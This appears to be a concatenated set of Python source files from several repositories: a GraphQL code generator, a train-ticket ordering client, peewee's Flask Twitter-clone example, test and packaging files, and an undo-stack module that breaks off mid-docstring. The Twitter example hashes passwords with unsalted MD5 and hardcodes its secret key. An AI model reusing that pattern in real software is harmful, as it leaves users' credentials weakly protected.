def validate_required_arguments(self, node):
field = self.field_stack[-1]
if not field:
return
required = set()
for a in field['args'].values():
if is_value_required(a):
required.add(a['name'])
for name, _ in node.arguments:
if name in required:
required.remove(name)
if required:
raise ValueError(
'missing required arguments: %s at %s' %
(', '.join(required), self.get_node_location(node))
)
def leave_field(self, node, *_args):
self.validate_required_arguments(node)
args = node.arguments
alias = ''
if node.alias:
alias = to_python_name(node.alias)
args = list(args) + [('__alias__', alias)]
name = to_python_name(node.name)
selection = '%(name)s(%(args)s)' % {
'name': name,
'args': ', '.join('%s=%r' % a for a in args),
}
if not alias:
alias = name
children = node.selection_set
self.type_stack.pop()
self.field_stack.pop()
return ('field', alias, selection, children)
def enter_argument(self, node, *_args):
typ = self.type_stack[-2]
field = self.field_stack[-1]
try:
name = node.name.value
arg = self.validation.get_field_argument(field, name)
if not arg:
self.type_stack.append(None)
return
self.type_stack.append(arg['type'])
except KeyError as ex:
self.report_field_argument_validation(node, typ, field, ex)
def leave_argument(self, node, *_args):
self.type_stack.pop()
return (to_python_name(node.name), node.value)
@staticmethod
def leave_fragment_spread(node, *_args):
return ('fragment', to_python_name(node.name))
def enter_inline_fragment(self, node, *_args):
typ = self.type_stack[-1]
if not typ:
self.type_stack.append(None)
return
type_name = node.type_condition.name.value
if type_name not in typ['possibleTypes']:
self.report_possible_type_validation(node, typ, type_name)
try:
typ = self.validation.get_type(type_name)
self.type_stack.append(typ)
except KeyError as ex:
self.report_type_validation(node, ex)
def leave_inline_fragment(self, node, *_args):
self.type_stack.pop()
return ('inline_fragment', node.type_condition['name'],
node.selection_set)
def validate_value(self, node, candidate_type, value):
try:
self.validation.validate_type(
self.type_stack[-1],
candidate_type,
value,
)
except Exception as ex:
self.report_validation_error(node, ex)
def leave_int_value(self, node, *_args):
value = int(node.value)
self.validate_value(node, 'Int', value)
return value
def leave_float_value(self, node, *_args):
value = float(node.value)
self.validate_value(node, 'Float', value)
return value
def leave_string_value(self, node, *_args):
value = node.value
self.validate_value(node, 'String', value)
return value
def leave_boolean_value(self, node, *_args):
value = node.value
self.validate_value(node, 'Boolean', value)
return value
def leave_null_value(self, node, *_args):
        value = Null()  # can't return None due to the Visitor() pattern
self.validate_value(node, 'Null', value)
return value
def leave_enum_value(self, node, *_args):
value = node.value
self.validate_value(node, 'Enum', value)
return value
@staticmethod
def leave_list_value(node, *_args):
return node.values
def leave_object_value(self, node, *_args):
value = dict(node.fields)
try:
self.validation.validate_input_object_fields(
self.type_stack[-1],
value,
)
except Exception as ex:
self.report_validation_error(node, ex)
return value
def enter_object_field(self, node, *_args):
typ = self.type_stack[-1]
if not typ:
self.type_stack.append(None)
return
try:
name = node.name.value
inner_type = self.validation.unwrap_type(typ)
typ = self.validation.get_type(inner_type['name'])
field = self.validation.get_type_field(typ, name)
self.type_stack.append(field['type'])
except KeyError as ex:
self.report_type_field_validation(node, typ, ex)
def leave_object_field(self, node, *_args):
self.type_stack.pop()
return (node.name, node.value)
class CodeGen:
def __init__(self, schema, schema_name, operations_gql,
writer, short_names):
'''
:param schema: if provided (not ``None``), will do validation
using :class:`SchemaValidation`, otherwise no validation
is done. It must be an introspection query result, usually
loaded from a JSON file.
:type schema: dict or None
:param schema_name: where to look for SGQLC schema.
:type schema_name: :class:`ParsedSchemaName`
:param operations_gql: a sequence of
:class:`graphql.language.source.Source` to parse.
:type operations_gql: list of :class:`graphql.language.source.Source`
:param writer: function used to output strings.
:type writer: function that receives a str and returns nothing
:param short_names: if ``True``, selection names will be short,
using a sequential index rather than the name prefix. This
improves loading huge files at the expense of readability.
:type short_names: bool
'''
self.schema = schema
self.schema_name = schema_name
self.operations_gql = operations_gql
self.writer = writer
self.short_names = short_names
if schema:
self.validation = SchemaValidation(schema)
else:
self.validation = NoValidation()
def write(self):
self.write_header()
self.write_operations()
def write_header(self):
self.writer('import sgqlc.types\n')
self.writer('import sgqlc.operation\n')
if self.schema_name.path:
self.writer('from %s import %s' %
(self.schema_name.path, self.schema_name.modname))
else:
self.writer('import ' + self.schema_name.modname)
self.writer('''
_schema = %s
_schema_root = _schema.%s
__all__ = ('Operations',)
''' % (self.schema_name.modname, self.schema_name.sym))
def write_operations(self):
for source in self.operations_gql:
self.write_operation(source)
def write_operation(self, source):
gql = parse_graphql(source)
kind_operations = {}
visitor = GraphQLToPython(
self.validation,
self.schema_name,
self.short_names,
)
for kind, name, code in visit(gql, visitor):
kind_operations.setdefault(kind, []).append((name, code))
# sort so fragments come first (fragment, mutation, query)
kinds = []
for kind, code_list in sorted(kind_operations.items()):
names = []
for name, code in code_list:
self.writer('\n\n')
self.writer(code)
names.append(name)
kinds.append(kind)
self.writer('\n\nclass %s:\n' % (kind.title(),))
for name in sorted(names):
self.writer(' %s = %s_%s()\n' % (name, kind, name))
self.writer('\n\nclass Operations:\n')
for kind in kinds:
self.writer(' %s = %s\n' % (kind, kind.title()))
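# Hypothetical driver for the class above (a sketch; the file names and the
# writer are placeholders, not part of the original module):
#   schema = load_schema(open('schema.json'))
#   name = ParsedSchemaName.parse_schema_name('..schema:schema')
#   gen = CodeGen(schema, name,
#                 [Source(open('ops.gql').read(), 'ops.gql')],
#                 sys.stdout.write, short_names=False)
#   gen.write()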
def add_arguments(ap):
ap.add_argument(
'schema-name',
help='The schema name to use in the imports. '
'It must be in the form: `modname:symbol`. '
'It may contain leading `.` to change the import '
'statement to `from . import` using that as path. '
'If `:symbol` is omitted, then `modname` is used.',
)
ap.add_argument(
'operations.py', type=argparse.FileType('w'), nargs='?',
help=('The output operations as Python file using '
'sgqlc.operation. Defaults to the stdout'),
default=sys.stdout,
)
ap.add_argument(
'operation.gql',
type=argparse.FileType('r'), nargs='*',
help='The input GraphQL (DSL) with operations',
default=[sys.stdin],
)
ap.add_argument(
'--schema', type=argparse.FileType('r'),
help=('The input schema as JSON file. '
'Usually the output from introspection query. '
'If given, the operations will be validated.'),
default=None,
)
ap.add_argument(
'--short-names', '-s',
help='Use short selection names',
default=False,
action='store_true',
)
def load_schema(in_file):
if not in_file:
return None
schema = json.load(in_file)
if not isinstance(schema, dict):
raise SystemExit('schema must be a JSON object')
if schema.get('types'):
return schema
elif schema.get('data', {}).get('__schema', None):
return schema['data']['__schema'] # plain HTTP endpoint result
elif schema.get('__schema'):
return schema['__schema'] # introspection field
else:
raise SystemExit(
'schema must be introspection object or query result')
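# For reference, the three accepted shapes (illustrative JSON, matching the
# branches above):
#   {"types": [...]}                          # already-unwrapped __schema
#   {"data": {"__schema": {"types": [...]}}}  # plain HTTP endpoint result
#   {"__schema": {"types": [...]}}            # introspection field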
def handle_command(parsed_args):
args = vars(parsed_args) # vars: operations.py and operation.gql
schema = load_schema(args['schema'])
schema_name = ParsedSchemaName.parse_schema_name(args['schema-name'])
out_file = args['operations.py']
in_files = args['operation.gql']
short_names = args['short_names']
operations_gql = [Source(f.read(), f.name) for f in in_files]
gen = CodeGen(
schema, schema_name, operations_gql,
out_file.write, short_names,
)
gen.write()
out_file.close()
def main():
ap = argparse.ArgumentParser(
description='Generate sgqlc operations using GraphQL (DSL)',
)
add_arguments(ap)
handle_command(ap.parse_args())
if __name__ == '__main__':
main()
| 32.838266 | 78 | 0.588926 |
4a20ef46d2f862c961842e6cfaa583beb71ff9e2 | 3,501 | py | Python | inter/CheckOrderInfo.py | middleprince/12306 | 31043bd053c2414b1be3e474184bb0c48c3abcca | ["MIT"] | 33,601 | 2018-01-08T14:37:50.000Z | 2022-03-31T06:45:04.000Z | inter/CheckOrderInfo.py | middleprince/12306 | 31043bd053c2414b1be3e474184bb0c48c3abcca | ["MIT"] | 724 | 2018-01-09T00:36:29.000Z | 2022-03-14T01:38:43.000Z | inter/CheckOrderInfo.py | middleprince/12306 | 31043bd053c2414b1be3e474184bb0c48c3abcca | ["MIT"] | 10,650 | 2018-01-08T03:26:48.000Z | 2022-03-31T01:50:15.000Z |
# coding=utf-8
from collections import OrderedDict
from inter.GetQueueCount import getQueueCount
from inter.GetRepeatSubmitToken import getRepeatSubmitToken
class checkOrderInfo:
def __init__(self, session, train_no, set_type, passengerTicketStrList, oldPassengerStr, station_dates, ticket_peoples):
self.train_no = train_no
self.set_type = set_type
self.passengerTicketStrList = passengerTicketStrList
self.oldPassengerStr = oldPassengerStr
self.station_dates = station_dates
self.ticket_peoples = ticket_peoples
self.RepeatSubmitToken = getRepeatSubmitToken(session)
self.getTicketInfoForPassengerForm = self.RepeatSubmitToken.sendGetRepeatSubmitToken()
self.ticketInfoForPassengerForm = self.getTicketInfoForPassengerForm.get("ticketInfoForPassengerForm", "")
self.token = self.getTicketInfoForPassengerForm.get("token", "")
self.session = self.getTicketInfoForPassengerForm.get("session", "")
def data_par(self):
"""
        Parameter structure.
:return:
"""
data = OrderedDict()
data['bed_level_order_num'] = "000000000000000000000000000000"
data['passengerTicketStr'] = self.passengerTicketStrList.rstrip("_{0}".format(self.set_type))
data['oldPassengerStr'] = self.oldPassengerStr
data['tour_flag'] = 'dc'
data['randCode'] = ""
data['cancel_flag'] = 2
data['_json_att'] = ""
data['REPEAT_SUBMIT_TOKEN'] = self.token
return data
def sendCheckOrderInfo(self):
"""
        Check the payment order; REPEAT_SUBMIT_TOKEN must be submitted.
        passengerTicketStr : seat code, 0, ticket type, passenger name, ID type, ID number, phone number, save as frequent contact (Y or N)
        oldPassengerStr: passenger name, ID type, ID number, passenger type
:return:
"""
CheckOrderInfoUrls = self.session.urls["checkOrderInfoUrl"]
data = self.data_par()
checkOrderInfoRep = self.session.httpClint.send(CheckOrderInfoUrls, data)
data = checkOrderInfoRep.get("data", {})
if data and data.get("submitStatus", False):
            print(u'Ticket submission passed, now trying to queue')
ifShowPassCodeTime = int(checkOrderInfoRep["data"]["ifShowPassCodeTime"]) / float(1000)
if "ifShowPassCode" in checkOrderInfoRep["data"] and checkOrderInfoRep["data"]["ifShowPassCode"] == "Y":
is_need_code = True
elif "ifShowPassCode" in checkOrderInfoRep["data"] and checkOrderInfoRep['data']['submitStatus'] is True:
is_need_code = False
else:
is_need_code = False
QueueCount = getQueueCount(self.session,
is_need_code,
ifShowPassCodeTime,
self.set_type,
self.station_dates,
self.train_no,
self.ticket_peoples,
self.ticketInfoForPassengerForm,
self.token,
self.oldPassengerStr,
self.passengerTicketStrList,
)
QueueCount.sendGetQueueCount()
elif "errMsg" in data and data["errMsg"]:
print(checkOrderInfoRep['data']["errMsg"])
elif 'messages' in checkOrderInfoRep and checkOrderInfoRep['messages']:
            print (checkOrderInfoRep['messages'][0])
 | 47.310811 | 124 | 0.595544 |
4a20f0286a52c94846813fe9a6a17e70cae8b440 | 11,438 | py | Python | examples/twitter/app.py | Walicen/peewee | e9c8bbf912903e167e052d07f6247801dd0346aa | ["MIT"] | 1 | 2019-11-17T04:55:26.000Z | 2019-11-17T04:55:26.000Z | examples/twitter/app.py | Walicen/peewee | e9c8bbf912903e167e052d07f6247801dd0346aa | ["MIT"] | 1 | 2021-01-31T08:37:28.000Z | 2021-01-31T08:37:28.000Z | examples/twitter/app.py | Walicen/peewee | e9c8bbf912903e167e052d07f6247801dd0346aa | ["MIT"] | 1 | 2020-03-08T10:00:27.000Z | 2020-03-08T10:00:27.000Z |
import datetime
from flask import Flask
from flask import g
from flask import redirect
from flask import request
from flask import session
from flask import url_for, abort, render_template, flash
from functools import wraps
from hashlib import md5
from peewee import *
# config - aside from our database, the rest is for use by Flask
DATABASE = 'tweepee.db'
DEBUG = True
SECRET_KEY = 'hin6bab8ge25*r=x&+5$0kn=-#log$pt^#@vrqjld!^2ci@g*b'
# create a flask application - this ``app`` object will be used to handle
# inbound requests, routing them to the proper 'view' functions, etc
app = Flask(__name__)
app.config.from_object(__name__)
# create a peewee database instance -- our models will use this database to
# persist information
database = SqliteDatabase(DATABASE)
# model definitions -- the standard "pattern" is to define a base model class
# that specifies which database to use. then, any subclasses will automatically
# use the correct storage. for more information, see:
# http://charlesleifer.com/docs/peewee/peewee/models.html#model-api-smells-like-django
class BaseModel(Model):
class Meta:
database = database
# the user model specifies its fields (or columns) declaratively, like django
class User(BaseModel):
username = CharField(unique=True)
password = CharField()
email = CharField()
join_date = DateTimeField()
# it often makes sense to put convenience methods on model instances, for
# example, "give me all the users this user is following":
def following(self):
# query other users through the "relationship" table
return (User
.select()
.join(Relationship, on=Relationship.to_user)
.where(Relationship.from_user == self)
.order_by(User.username))
def followers(self):
return (User
.select()
.join(Relationship, on=Relationship.from_user)
.where(Relationship.to_user == self)
.order_by(User.username))
def is_following(self, user):
return (Relationship
.select()
.where(
(Relationship.from_user == self) &
(Relationship.to_user == user))
.exists())
def gravatar_url(self, size=80):
return 'http://www.gravatar.com/avatar/%s?d=identicon&s=%d' % \
(md5(self.email.strip().lower().encode('utf-8')).hexdigest(), size)
# this model contains two foreign keys to user -- it essentially allows us to
# model a "many-to-many" relationship between users. by querying and joining
# on different columns we can expose who a user is "related to" and who is
# "related to" a given user
class Relationship(BaseModel):
from_user = ForeignKeyField(User, backref='relationships')
to_user = ForeignKeyField(User, backref='related_to')
class Meta:
indexes = (
# Specify a unique multi-column index on from/to-user.
(('from_user', 'to_user'), True),
)
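# For instance (an illustrative query, mirroring User.followers above), "who
# follows user u" joins through Relationship on the from_user column:
#   (User.select()
#        .join(Relationship, on=Relationship.from_user)
#        .where(Relationship.to_user == u))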
# a dead simple one-to-many relationship: one user has 0..n messages, exposed by
# the foreign key. thanks to the backref, a user's messages are accessible
# as a special attribute, User.messages
class Message(BaseModel):
user = ForeignKeyField(User, backref='messages')
content = TextField()
pub_date = DateTimeField()
# simple utility function to create tables
def create_tables():
with database:
database.create_tables([User, Relationship, Message])
# flask provides a "session" object, which allows us to store information across
# requests (stored by default in a secure cookie). this function allows us to
# mark a user as being logged-in by setting some values in the session data:
def auth_user(user):
session['logged_in'] = True
session['user_id'] = user.id
session['username'] = user.username
flash('You are logged in as %s' % (user.username))
# get the user from the session
def get_current_user():
if session.get('logged_in'):
return User.get(User.id == session['user_id'])
# view decorator which indicates that the requesting user must be authenticated
# before they can access the view. it checks the session to see if they're
# logged in, and if not redirects them to the login view.
def login_required(f):
@wraps(f)
def inner(*args, **kwargs):
if not session.get('logged_in'):
return redirect(url_for('login'))
return f(*args, **kwargs)
return inner
# given a template and a SelectQuery instance, render a paginated list of
# objects from the query inside the template
def object_list(template_name, qr, var_name='object_list', **kwargs):
kwargs.update(
page=int(request.args.get('page', 1)),
        pages=qr.count() // 20 + 1)  # integer division keeps the page count an int
kwargs[var_name] = qr.paginate(kwargs['page'])
return render_template(template_name, **kwargs)
# retrieve a single object matching the specified query or 404 -- this uses the
# shortcut "get" method on model, which retrieves a single object or raises a
# DoesNotExist exception if no matching object exists
# http://charlesleifer.com/docs/peewee/peewee/models.html#Model.get)
def get_object_or_404(model, *expressions):
try:
return model.get(*expressions)
except model.DoesNotExist:
abort(404)
# custom template filter -- flask allows you to define these functions and then
# they are accessible in the template -- this one returns a boolean whether the
# given user is following another user.
@app.template_filter('is_following')
def is_following(from_user, to_user):
return from_user.is_following(to_user)
# Request handlers -- these two hooks are provided by flask and we will use them
# to create and tear down a database connection on each request.
@app.before_request
def before_request():
g.db = database
g.db.connect()
@app.after_request
def after_request(response):
g.db.close()
return response
# views -- these are the actual mappings of url to view function
@app.route('/')
def homepage():
# depending on whether the requesting user is logged in or not, show them
# either the public timeline or their own private timeline
if session.get('logged_in'):
return private_timeline()
else:
return public_timeline()
@app.route('/private/')
def private_timeline():
# the private timeline exemplifies the use of a subquery -- we are asking for
# messages where the person who created the message is someone the current
# user is following. these messages are then ordered newest-first.
user = get_current_user()
messages = (Message
.select()
.where(Message.user << user.following())
.order_by(Message.pub_date.desc()))
return object_list('private_messages.html', messages, 'message_list')
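# The query above roughly corresponds to this SQL (illustrative sketch):
#   SELECT * FROM message WHERE user_id IN
#     (SELECT t1.id FROM user t1
#      INNER JOIN relationship t2 ON t2.to_user_id = t1.id
#      WHERE t2.from_user_id = ?)
#   ORDER BY pub_date DESC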
@app.route('/public/')
def public_timeline():
# simply display all messages, newest first
messages = Message.select().order_by(Message.pub_date.desc())
return object_list('public_messages.html', messages, 'message_list')
@app.route('/join/', methods=['GET', 'POST'])
def join():
if request.method == 'POST' and request.form['username']:
try:
with database.atomic():
# Attempt to create the user. If the username is taken, due to the
# unique constraint, the database will raise an IntegrityError.
user = User.create(
username=request.form['username'],
password=md5((request.form['password']).encode('utf-8')).hexdigest(),
email=request.form['email'],
join_date=datetime.datetime.now())
# mark the user as being 'authenticated' by setting the session vars
auth_user(user)
return redirect(url_for('homepage'))
except IntegrityError:
flash('That username is already taken')
return render_template('join.html')
@app.route('/login/', methods=['GET', 'POST'])
def login():
if request.method == 'POST' and request.form['username']:
try:
pw_hash = md5(request.form['password'].encode('utf-8')).hexdigest()
user = User.get(
(User.username == request.form['username']) &
(User.password == pw_hash))
except User.DoesNotExist:
flash('The password entered is incorrect')
else:
auth_user(user)
return redirect(url_for('homepage'))
return render_template('login.html')
@app.route('/logout/')
def logout():
session.pop('logged_in', None)
flash('You were logged out')
return redirect(url_for('homepage'))
@app.route('/following/')
@login_required
def following():
user = get_current_user()
return object_list('user_following.html', user.following(), 'user_list')
@app.route('/followers/')
@login_required
def followers():
user = get_current_user()
return object_list('user_followers.html', user.followers(), 'user_list')
@app.route('/users/')
def user_list():
users = User.select().order_by(User.username)
return object_list('user_list.html', users, 'user_list')
@app.route('/users/<username>/')
def user_detail(username):
# using the "get_object_or_404" shortcut here to get a user with a valid
# username or short-circuit and display a 404 if no user exists in the db
user = get_object_or_404(User, User.username == username)
    # get all the user's messages ordered newest-first -- note how we're accessing
    # the messages via the backref -- user.messages. could also have written it as:
    # Message.select().where(Message.user == user)
messages = user.messages.order_by(Message.pub_date.desc())
return object_list('user_detail.html', messages, 'message_list', user=user)
@app.route('/users/<username>/follow/', methods=['POST'])
@login_required
def user_follow(username):
user = get_object_or_404(User, User.username == username)
try:
with database.atomic():
Relationship.create(
from_user=get_current_user(),
to_user=user)
except IntegrityError:
pass
flash('You are following %s' % user.username)
return redirect(url_for('user_detail', username=user.username))
@app.route('/users/<username>/unfollow/', methods=['POST'])
@login_required
def user_unfollow(username):
user = get_object_or_404(User, User.username == username)
(Relationship
.delete()
.where(
(Relationship.from_user == get_current_user()) &
(Relationship.to_user == user))
.execute())
flash('You are no longer following %s' % user.username)
return redirect(url_for('user_detail', username=user.username))
@app.route('/create/', methods=['GET', 'POST'])
@login_required
def create():
user = get_current_user()
if request.method == 'POST' and request.form['content']:
message = Message.create(
user=user,
content=request.form['content'],
pub_date=datetime.datetime.now())
flash('Your message has been created')
return redirect(url_for('user_detail', username=user.username))
return render_template('create.html')
@app.context_processor
def _inject_user():
return {'current_user': get_current_user()}
# allow running from the command line
if __name__ == '__main__':
create_tables()
app.run()
| 36.311111 | 89 | 0.673195 |
4a20f18111bf36fd922e7d81a8bea980b6ab4016 | 797 | py | Python | imperative/python/megengine/conftest.py | Olalaye/MegEngine | 695d24f24517536e6544b07936d189dbc031bbce | ["Apache-2.0"] | 1 | 2022-03-21T03:13:45.000Z | 2022-03-21T03:13:45.000Z | imperative/python/megengine/conftest.py | Olalaye/MegEngine | 695d24f24517536e6544b07936d189dbc031bbce | ["Apache-2.0"] | null | null | null | imperative/python/megengine/conftest.py | Olalaye/MegEngine | 695d24f24517536e6544b07936d189dbc031bbce | ["Apache-2.0"] | null | null | null |
import pytest
import megengine
@pytest.fixture(autouse=True)
def import_megengine_path(doctest_namespace):
doctest_namespace["mge"] = megengine
doctest_namespace["Tensor"] = megengine.Tensor
doctest_namespace["F"] = megengine.functional
doctest_namespace["M"] = megengine.module
doctest_namespace["Q"] = megengine.quantization
doctest_namespace["data"] = megengine.data
doctest_namespace["autodiff"] = megengine.autodiff
doctest_namespace["optim"] = megengine.optimizer
doctest_namespace["jit"] = megengine.jit
doctest_namespace["amp"] = megengine.amp
doctest_namespace["dist"] = megengine.distributed
doctest_namespace["tm"] = megengine.traced_module
doctest_namespace["hub"] = megengine.hub
doctest_namespace["utils"] = megengine.utils
| 36.227273 | 54 | 0.750314 |
4a20f1ea6a8c97b2f23c931126e6b5b7a6650921 | 1,920 | py | Python | djangocms_fbcomments/migrations/0001_initial.py | mishbahr/djangocms-fbcomments | 4e6bf2c636196fee85a489b510f13ae67ae05af6 | ["BSD-3-Clause"] | 20 | 2015-09-29T10:00:56.000Z | 2018-06-15T03:28:36.000Z | djangocms_fbcomments/migrations/0001_initial.py | mishbahr/djangocms-fbcomments | 4e6bf2c636196fee85a489b510f13ae67ae05af6 | ["BSD-3-Clause"] | 1 | 2020-05-14T02:23:00.000Z | 2020-05-27T14:45:59.000Z | djangocms_fbcomments/migrations/0001_initial.py | mishbahr/djangocms-fbcomments | 4e6bf2c636196fee85a489b510f13ae67ae05af6 | ["BSD-3-Clause"] | 2 | 2016-08-04T21:35:40.000Z | 2020-05-14T02:19:06.000Z |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
from djangocms_fbcomments.conf import settings
class Migration(migrations.Migration):
dependencies = [
('cms', '__latest__'),
]
operations = [
migrations.CreateModel(
name='FacebookComments',
fields=[
('cmsplugin_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='cms.CMSPlugin')),
('app_id', models.CharField(default=settings.DJANGOCMS_FBCOMMENTS_APP_ID, max_length=100, verbose_name='Facebook App ID')),
('title', models.CharField(max_length=255, verbose_name='Title', blank=True)),
('num_posts', models.PositiveIntegerField(default=10, help_text='The number of comments to show by default.', verbose_name='Number of Comments')),
('order_by', models.CharField(default=settings.DJANGOCMS_FBCOMMENTS_COMMENTS_ORDERING[0][0], help_text='The order to use when displaying comments.', max_length=20, verbose_name='Comments Ordering', choices=settings.DJANGOCMS_FBCOMMENTS_COMMENTS_ORDERING)),
('colour_scheme', models.CharField(default=settings.DJANGOCMS_FBCOMMENTS_COLOUR_SCHEMES[0][0], max_length=50, verbose_name='Colour Scheme', choices=settings.DJANGOCMS_FBCOMMENTS_COLOUR_SCHEMES)),
('load_trigger', models.CharField(default=settings.DJANGOCMS_FBCOMMENTS_LOADING_CHOICES[0][0], max_length=100, verbose_name='How to load comments', choices=settings.DJANGOCMS_FBCOMMENTS_LOADING_CHOICES)),
('button_text', models.CharField(help_text='By default it will be "Load Comments..."', max_length=100, verbose_name='Button Text', blank=True)),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
]
| 56.470588 | 272 | 0.685938 |
4a20f25e4d6a5d918d3db80cf44957c3c78cedb0 | 1,149 | py | Python | setup.py | nikvdp/notion-py | 57a2989b96870bfb119304c7c9df8d09ab7091b3 | ["MIT"] | null | null | null | setup.py | nikvdp/notion-py | 57a2989b96870bfb119304c7c9df8d09ab7091b3 | ["MIT"] | null | null | null | setup.py | nikvdp/notion-py | 57a2989b96870bfb119304c7c9df8d09ab7091b3 | ["MIT"] | null | null | null |
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
def get_requirements(fname):
"Takes requirements from requirements.txt and returns a list."
with open(fname) as fp:
reqs = list()
for lib in fp.read().split("\n"):
# Ignore pypi flags and comments
if not lib.startswith("-") or lib.startswith("#"):
reqs.append(lib.strip())
return reqs
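# e.g. (illustrative input) a requirements.txt containing
#   requests>=2.0
#   # a comment
#   --extra-index-url https://example.invalid
# yields ['requests>=2.0'].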
install_requires = get_requirements("requirements.txt")
setuptools.setup(
name="notion",
version="0.0.26",
author="Jamie Alexandre",
author_email="[email protected]",
description="Unofficial Python API client for Notion.so",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/jamalex/notion-py",
install_requires=install_requires,
include_package_data=True,
packages=setuptools.find_packages(),
python_requires=">=3.5",
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
| 29.461538 | 66 | 0.653612 |
4a20f29a1443150fdced8fd6a7410194c2ea2edd | 358 | py | Python | test.py | drsolaris/exploding_mewgenics | 66b162fc83888ada74070fbaed5f70292f684b7c | ["Unlicense"] | null | null | null | test.py | drsolaris/exploding_mewgenics | 66b162fc83888ada74070fbaed5f70292f684b7c | ["Unlicense"] | null | null | null | test.py | drsolaris/exploding_mewgenics | 66b162fc83888ada74070fbaed5f70292f684b7c | ["Unlicense"] | null | null | null |
from game.game import Game
import pickle
file_Name = '462.net' #1456 1149
with open(file_Name, 'rb') as fileObject:
net1 = pickle.load(fileObject)
file_Name = '1027.net' #1119 #584
with open(file_Name, 'rb') as fileObject:
net2 = pickle.load(fileObject)
wins = 0
for _ in range(100):
game = Game([net1, net2])
wins += game.play()
print(wins/100)
| 19.888889 | 41 | 0.695531 |
4a20f60850339cdc87c0c74a4d2a21787ace109e | 706 | py | Python | NATOConsole.py | twomilessolutions/NATOPhoneticAlphabetHelper | 1fe7dad64d177c2529518ff90b510774a027f257 | ["MIT"] | null | null | null | NATOConsole.py | twomilessolutions/NATOPhoneticAlphabetHelper | 1fe7dad64d177c2529518ff90b510774a027f257 | ["MIT"] | null | null | null | NATOConsole.py | twomilessolutions/NATOPhoneticAlphabetHelper | 1fe7dad64d177c2529518ff90b510774a027f257 | ["MIT"] | null | null | null |
from NATOTranslator import NATOTranslator
from colorama import init, Fore
init()
def main():
word = input("\n\nEnter the word, phrase, or sentence you would like the NATO Phonetic translation for: ")
translator = NATOTranslator()
translation = translator.translate_string(word)
print_string = ""
counter = 0
counter_limit = 10
for line in translation:
print_string = print_string + line
counter += 1
if counter >= counter_limit:
counter = 0
print_string = print_string + "\n"
print(Fore.CYAN + print_string)
print(Fore.WHITE + "")
input("Press any key to exit...")
if __name__ == "__main__":
    main()
 | 24.344828 | 89 | 0.635977 |
4a20f724ef26903de7d319cae9d6b9beb6b99f7e | 733 | py | Python | martypy/RateAverager.py | robotical/martypy | afc1f89d471875ca1beb775f375438f97fc33679 | ["Apache-2.0"] | 8 | 2017-08-02T11:31:50.000Z | 2022-01-05T14:36:53.000Z | martypy/RateAverager.py | robotical/martypy | afc1f89d471875ca1beb775f375438f97fc33679 | ["Apache-2.0"] | 17 | 2017-07-24T22:39:43.000Z | 2022-01-05T14:41:20.000Z | martypy/RateAverager.py | robotical/martypy | afc1f89d471875ca1beb775f375438f97fc33679 | ["Apache-2.0"] | 5 | 2017-11-12T08:51:18.000Z | 2020-11-27T09:28:46.000Z |
import time
# SPDX-License-Identifier: BSD-3-Clause
# © 2021 Contributors to the easyCore project <https://github.com/easyScience/easyCore>
__author__ = 'github.com/wardsimon'
__version__ = '0.1.0'
import abc
from collections import deque, UserDict
from typing import Union, Any, NoReturn, Callable, TypeVar, MutableMapping
from easyCore import borg
class UndoCommand(metaclass=abc.ABCMeta):
"""
The Command interface pattern
"""
def __init__(self, obj) -> None:
self._obj = obj
self._text = None
@abc.abstractmethod
def undo(self) -> NoReturn:
"""
Undo implementation which should be overwritten
"""
@abc.abstractmethod
def redo(self) -> NoReturn:
"""
Redo implementation which should be overwritten
"""
@property
def text(self) -> str:
return self._text
@text.setter
def text(self, text: str) -> NoReturn:
self._text = text
T_ = TypeVar('T_', bound=UndoCommand)
def dict_stack_deco(func: Callable) -> Callable:
def inner(obj, *args, **kwargs):
# Only do the work to a NotarizedDict.
if hasattr(obj, '_stack_enabled') and obj._stack_enabled:
if not kwargs:
borg.stack.push(DictStack(obj, *args))
else:
borg.stack.push(DictStackReCreate(obj, **kwargs))
else:
func(obj, *args, **kwargs)
return inner
class NotarizedDict(UserDict):
"""
A simple dict drop in for easyCore group classes. This is used as it wraps the get/set methods
"""
def __init__(self, **kwargs):
super().__init__(**kwargs)
self._borg = borg
self._stack_enabled = False
@classmethod
def _classname(cls):
# This method just returns the name of the class
return cls.__name__
@dict_stack_deco
def __setitem__(self, key, value):
super(NotarizedDict, self).__setitem__(key, value)
@dict_stack_deco
def __delitem__(self, key):
super(NotarizedDict, self).__delitem__(key)
def __repr__(self):
return f"{self._classname()}({self.data})"
@dict_stack_deco
def reorder(self, **kwargs):
self.data = kwargs.copy()
class CommandHolder:
"""
A holder for one or more commands which are added to the stack
"""
def __init__(self, text: str = None):
self._commands = deque()
self._text = text
self.__index = 0
def append(self, command: T_):
self._commands.appendleft(command)
def pop(self):
return self._commands.popleft()
def __iter__(self) -> T_:
while self.__index < len(self):
index = self.__index
self.__index += 1
yield self._commands[index]
self.__index = 0
def __len__(self) -> int:
return len(self._commands)
@property
def is_macro(self) -> bool:
return len(self) > 1
@property
def current(self) -> T_:
return self._commands[0]
@property
def text(self) -> str:
text = ''
if self._commands:
text = self._commands[-1].text
if self._text is not None:
text = self._text
return text
@text.setter
def text(self, text: str):
self._text = text
class UndoStack:
"""
Implement a version of QUndoStack without the QT
"""
def __init__(self, max_history: Union[int, type(None)] = None):
self._history = deque(maxlen=max_history)
self._future = deque(maxlen=max_history)
self._macro_running = False
self._command_running = False
self._max_history = max_history
self._enabled = False
@property
def enabled(self) -> bool:
return self._enabled
@enabled.setter
def enabled(self, state: bool):
if self.enabled and self._macro_running:
self.endMacro()
self._enabled = state
def force_state(self, state: bool):
self._enabled = state
@property
def history(self) -> deque:
return self._history
@property
def future(self) -> deque:
return self._future
def push(self, command: T_) -> NoReturn:
"""
Add a command to the history stack
"""
# If we're not enabled, then what are we doing!
if not self.enabled or self._command_running:
# Do the command and leave.
command.redo()
return
# If there's a macro add the command to the command holder
if self._macro_running:
self.history[0].append(command)
else:
# Else create the command holder and add it to the stack
com = CommandHolder()
com.append(command)
self.history.appendleft(com)
# Actually do the command
command.redo()
# Reset the future
self._future = deque(maxlen=self._max_history)
def pop(self) -> T_:
"""
!! WARNING - TO BE USED WITH EMINENCE CAUTION !!
!! THIS IS PROBABLY NOT THE FN YOU'RE LOOKING FOR, IT CAN BREAK A LOT OF STUFF !!
